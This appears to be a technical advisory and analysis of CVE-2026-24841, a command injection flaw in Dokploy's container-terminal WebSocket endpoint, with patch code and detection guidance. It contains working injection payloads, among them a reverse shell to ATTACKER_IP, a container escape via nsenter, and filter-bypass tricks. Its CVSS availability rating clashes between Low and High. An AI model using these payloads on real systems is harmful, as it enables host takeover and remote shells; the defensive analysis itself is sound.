CVE-2026-24841
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: Low
Description
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameters are directly interpolated into shell commands without sanitization, allowing authenticated attackers to execute arbitrary commands on the host server. Version 0.26.6 fixes the issue.
Comprehensive Technical Analysis of CVE-2026-24841
Dokploy Command Injection Vulnerability (CVSS 9.9)
1. Vulnerability Assessment and Severity Evaluation
CVE-2026-24841 is a critical command injection vulnerability in Dokploy, a self-hosted Platform-as-a-Service (PaaS) solution. The flaw resides in the WebSocket endpoint /docker-container-terminal, where user-supplied input (containerId and activeWay) is directly interpolated into shell commands without proper sanitization.
Severity Justification (CVSS 9.9 - Critical)
| CVSS Metric | Score | Rationale |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via WebSocket. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Privileges Required (PR) | Low (L) | Only authenticated access needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Changed (C) | Compromise affects the host system, not just the application. |
| Confidentiality (C) | High (H) | Arbitrary command execution leads to full data exposure. |
| Integrity (I) | High (H) | Attacker can modify files, configurations, or deploy malware. |
| Availability (A) | High (H) | Host system can be crashed or rendered unusable. |
Key Takeaways:
- High Impact: Full host compromise possible.
- Low Attack Complexity: Exploitation requires minimal effort.
- Network-Exploitable: No physical access or local privileges needed.
- Authenticated Attack Required: Reduces risk slightly but does not mitigate severity.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper input validation in the WebSocket handler (docker-container-terminal.ts). The containerId and activeWay parameters are concatenated directly into shell commands, allowing command injection via metacharacters (e.g., ;, &&, |, `, $()).
Proof-of-Concept (PoC) Exploitation Steps:
- Authenticate to Dokploy (valid credentials required).
- Establish a WebSocket connection to `/docker-container-terminal`.
- Send a malicious payload in the `containerId` or `activeWay` parameter:
  `{ "containerId": "legitimate_container; id > /tmp/pwned;", "activeWay": "exec" }`
- Result: The `id` command executes on the host, writing output to `/tmp/pwned`.
Advanced Exploitation Scenarios:
- Reverse Shell:
  `{ "containerId": "legitimate_container; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'", "activeWay": "exec" }`
- Container Escape & Host Compromise: if Dokploy runs in a container, an attacker could break out using:
  `{ "containerId": "legitimate_container; nsenter --target 1 --mount --uts --ipc --net --pid sh", "activeWay": "exec" }`
- Persistence & Lateral Movement:
  - Deploy a cron job or SSH key for persistence.
  - Exfiltrate sensitive data (e.g., Docker secrets, API keys).
3. Affected Systems and Software Versions
| Component | Affected Versions | Fixed Version |
|---|---|---|
| Dokploy | All versions < 0.26.6 | 0.26.6 |
| Dependencies | N/A (Self-contained) | N/A |
Deployment Scenarios at Risk:
- Self-hosted Dokploy instances (on-premises or cloud).
- Multi-tenant PaaS environments where Dokploy manages containers.
- CI/CD pipelines using Dokploy for deployment automation.
4. Recommended Mitigation Strategies
Immediate Actions (For Affected Users)
- Upgrade to Dokploy v0.26.6 (or later) immediately.
  - Patch commit: 74e0bd5fe3ef7199f44fcd19c6f5a2f09b806d6f
- Isolate Dokploy Instances (if patching is delayed):
  - Restrict network access to the WebSocket endpoint (`/docker-container-terminal`).
  - Use firewall rules to limit connections to trusted IPs.
- Disable WebSocket Terminal Access (temporary workaround):
  - Modify `docker-container-terminal.ts` to disable the endpoint if not critical.
Long-Term Security Hardening
- Input Validation & Sanitization:
  - Whitelist allowed characters for `containerId` (alphanumeric + hyphens/underscores).
  - Pass arguments as an array without a shell (e.g., `execFile` in Node.js) instead of interpolating them into a command string.
- Least Privilege Principle:
  - Run Dokploy with minimal permissions (avoid `root`).
  - Use Docker's `--read-only` and `--cap-drop=ALL` for containers.
- Web Application Firewall (WAF) Rules:
  - Deploy a WAF (e.g., ModSecurity, Cloudflare) to block command injection patterns.
- Runtime Protection:
  - Use eBPF-based tools (e.g., Falco, Aqua Security) to detect anomalous shell executions.
- Network Segmentation:
  - Isolate Dokploy in a dedicated VLAN with strict access controls.
- Logging & Monitoring:
  - Enable audit logging for WebSocket connections.
  - Set up SIEM alerts for suspicious command executions (e.g., `;`, `&&`, `|`).
5. Impact on the Cybersecurity Landscape
Broader Implications
- Supply Chain Risks:
  - Dokploy is used in CI/CD pipelines, meaning a compromise could lead to malicious code deployment in downstream applications.
- Container Security Challenges:
  - Highlights the danger of improper input handling in container management tools.
  - Reinforces the need for secure coding practices in PaaS/IaaS solutions.
- Exploitation in the Wild:
  - Given the CVSS 9.9 score, this vulnerability is highly attractive to attackers, including:
    - APT groups (for lateral movement).
    - Cryptojackers (for resource hijacking).
    - Ransomware operators (for initial access).
- Regulatory & Compliance Risks:
  - Organizations using Dokploy may face compliance violations (e.g., GDPR, HIPAA, PCI-DSS) if exploited.
Historical Context
- Similar vulnerabilities:
- CVE-2021-41079 (Docker CLI command injection).
- CVE-2020-15257 (Containerd escape via API).
- Lessons Learned:
- Never trust user input, even in WebSocket APIs.
- Assume breach and implement defense-in-depth.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from unsafe string interpolation in docker-container-terminal.ts:
```typescript
// Vulnerable Code (Pre-0.26.6)
import { exec } from "child_process";

// Both values come straight from the WebSocket message and are interpolated
// into a single string that exec() hands to a shell, so ";" or "&&" in either
// field terminates the docker command and starts a new one.
const command = `docker exec -it ${containerId} ${activeWay}`;
exec(command, (error, stdout, stderr) => { ... });
```
- Problem: `containerId` and `activeWay` are not sanitized, allowing command chaining via shell metacharacters.
Patch Analysis (Fixed in v0.26.6)
The fix introduces input validation and parameterized execution:
```typescript
// Fixed Code (Post-0.26.6)
import { spawn } from "child_process";

// Reject anything that is not a plausible container identifier before it
// reaches the command line.
if (!/^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/.test(containerId)) {
  throw new Error("Invalid containerId");
}
// Pass arguments as an array: each element is one argv entry and no shell
// ever parses the string, so metacharacters have no special meaning.
const args = ["exec", "-it", containerId, activeWay];
const child = spawn("docker", args, { shell: false });
```
- Key Improvements:
  - Regex validation for `containerId`.
  - `spawn` instead of `exec` (avoids shell interpretation).
  - `shell: false` prevents command injection.
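To make the two code shapes above concrete, the following added example (not Dokploy's own code) puts the vulnerable string-building and the hardened argv-building side by side and shows, by spawning node in place of the docker binary, that a `shell: false` child receives the advisory's PoC payload as one literal argument. The `ACTIVE_WAYS` allowlist is a hypothetical stand-in; the real set of accepted values is not on this page.

```typescript
import { spawnSync } from "child_process";

// Allowlist regex taken from the 0.26.6 fix quoted above.
const CONTAINER_ID_RE = /^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/;
// Hypothetical allowlist for activeWay; Dokploy's real set of values is not on this page.
const ACTIVE_WAYS = new Set(["bash", "sh"]);

// Pre-0.26.6 shape: one string that a shell will tokenise, so ";" ends the docker
// command and whatever follows runs as a separate command.
function vulnerableCommand(containerId: string, activeWay: string): string {
  return `docker exec -it ${containerId} ${activeWay}`;
}

// Post-0.26.6 shape: validate both fields, then return argv for spawn(..., { shell: false }).
function buildDockerArgs(containerId: string, activeWay: string): string[] {
  if (!CONTAINER_ID_RE.test(containerId)) throw new Error("Invalid containerId");
  if (!ACTIVE_WAYS.has(activeWay)) throw new Error("Invalid activeWay");
  return ["exec", "-it", containerId, activeWay];
}

// Demonstrates the shell:false property on its own: node stands in for the docker
// binary and echoes back the argv it received. Metacharacters arrive as one literal
// argument instead of being interpreted, which is why the fix uses spawn(), not exec().
function argvSeenByChild(args: string[]): string[] {
  const res = spawnSync(
    process.execPath,
    ["-e", "console.log(JSON.stringify(process.argv.slice(1)))", ...args],
    { shell: false, encoding: "utf8" },
  );
  return JSON.parse(res.stdout.trim()) as string[];
}

// Stand-alone demo with the advisory's PoC payload.
const payload = "legitimate_container; id > /tmp/pwned;";
console.log(vulnerableCommand(payload, "bash"));                // a shell would run "id" after docker
console.log(argvSeenByChild(["exec", "-it", payload, "bash"])); // one intact argument, nothing executed
try { buildDockerArgs(payload, "bash"); } catch (e) { console.log((e as Error).message); }
```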
Exploitation Detection & Forensics
Indicators of Compromise (IoCs)
- Logs:
  - Unusual `docker exec` commands in `/var/log/docker.log` or `/var/log/syslog`.
  - WebSocket connections with suspicious payloads (e.g., `;`, `&&`, `|`).
- File System Artifacts:
  - Unexpected files in `/tmp` (e.g., `/tmp/pwned`).
  - New SSH keys in `~/.ssh/authorized_keys`.
- Network Traffic:
  - Outbound connections to unexpected IPs (reverse shells, C2 servers).
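The log-based IoC above (terminal requests whose `containerId` or `activeWay` carries shell metacharacters) can be turned into a small hunting check. The example below is added here and is not part of the advisory or of Dokploy; it assumes a constructed JSON-lines audit log of WebSocket terminal requests, and it alerts on anything that fails the fix's allowlist regex rather than only on a metacharacter blocklist, so the `${IFS}` style evasion mentioned later on this page is caught as well.

```typescript
// Allowlist regex from the 0.26.6 fix; anything that fails it is worth an alert,
// which also covers evasions such as ${IFS} or URL-encoding that a blocklist misses.
const CONTAINER_ID_RE = /^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/;
// Shell metacharacters named in the advisory (; && | ` $( ) plus redirects).
const METACHARS = /[;&|`$()<>]/;

type Field = "containerId" | "activeWay";
interface TerminalEvent { ts: string; user: string; path: string; containerId: string; activeWay: string; }
interface Alert { ts: string; user: string; field: Field; value: string; reason: string; }

// Constructed sample: one JSON object per line, as an audit log of terminal WebSocket
// requests might record them (assumed format; Dokploy's own logging may differ).
const SAMPLE_LOG = [
  '{"ts":"2026-01-28T10:00:01Z","user":"alice","path":"/docker-container-terminal","containerId":"web-1","activeWay":"bash"}',
  '{"ts":"2026-01-28T10:00:07Z","user":"bob","path":"/docker-container-terminal","containerId":"legitimate_container; id > /tmp/pwned;","activeWay":"exec"}',
  '{"ts":"2026-01-28T10:00:09Z","user":"bob","path":"/docker-container-terminal","containerId":"web-1;id${IFS}>/tmp/pwned","activeWay":"bash"}',
  '{"ts":"2026-01-28T10:00:12Z","user":"carol","path":"/api/deploy","containerId":"not; checked","activeWay":"n/a"}',
].join("\n");

function parseEvent(line: string): TerminalEvent | null {
  try { return JSON.parse(line) as TerminalEvent; } catch { return null; } // skip malformed lines
}

function reasonFor(field: Field, value: string): string | null {
  if (field === "containerId" && !CONTAINER_ID_RE.test(value)) {
    return METACHARS.test(value) ? "containerId contains shell metacharacters" : "containerId fails allowlist regex";
  }
  if (field === "activeWay" && METACHARS.test(value)) return "activeWay contains shell metacharacters";
  return null;
}

// Scans the log and returns one alert per suspicious field of each terminal request.
function detectTerminalInjection(log: string): Alert[] {
  const alerts: Alert[] = [];
  for (const line of log.split("\n")) {
    if (!line.trim()) continue;
    const ev = parseEvent(line);
    if (!ev || ev.path !== "/docker-container-terminal") continue; // only the vulnerable endpoint
    for (const field of ["containerId", "activeWay"] as const) {
      const reason = reasonFor(field, ev[field]);
      if (reason) alerts.push({ ts: ev.ts, user: ev.user, field, value: ev[field], reason });
    }
  }
  return alerts;
}

for (const a of detectTerminalInjection(SAMPLE_LOG)) console.log(`${a.ts} ${a.user} ${a.reason}: ${a.value}`);
```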
Forensic Investigation Steps
- Check WebSocket Logs: `grep -r "docker-container-terminal" /var/log/nginx/access.log`
- Inspect Docker Events: `docker events --since "2026-01-28" --filter event=exec_create`
- Analyze Running Processes: `ps aux | grep -E "docker exec|bash -c|nc -lvp"`
- Memory Forensics (Volatility): `volatility -f memory.dump linux_pslist | grep -i "docker"`
Red Team & Penetration Testing Guidance
- Exploitation Tools:
  - Burp Suite / OWASP ZAP (for WebSocket fuzzing).
  - Metasploit (if a module is developed).
- Bypass Techniques (if patch is incomplete):
  - URL-encoded payloads (e.g., `%3B` for `;`).
  - Alternative shell metacharacters (e.g., `${IFS}` for spaces).
- Post-Exploitation:
  - Container Breakout: Use `nsenter` or `capsh` to escape.
  - Persistence: Add a cron job or systemd service.
Conclusion & Recommendations
CVE-2026-24841 is a critical command injection vulnerability with severe real-world impact. Organizations using Dokploy must:
- Patch immediately to v0.26.6.
- Audit systems for signs of exploitation.
- Implement defense-in-depth (WAF, least privilege, monitoring).
For Security Teams:
- Prioritize patching in vulnerability management programs.
- Hunt for IoCs in logs and network traffic.
- Educate developers on secure coding practices for WebSocket APIs.
For Developers:
- Never use string interpolation for shell commands.
- Use parameterized execution (`spawn`, `execFile`).
- Validate all inputs with strict allowlists.
This vulnerability underscores the critical importance of input sanitization in modern cloud-native applications. Failure to address it could lead to full system compromise, data breaches, and lateral movement in enterprise environments.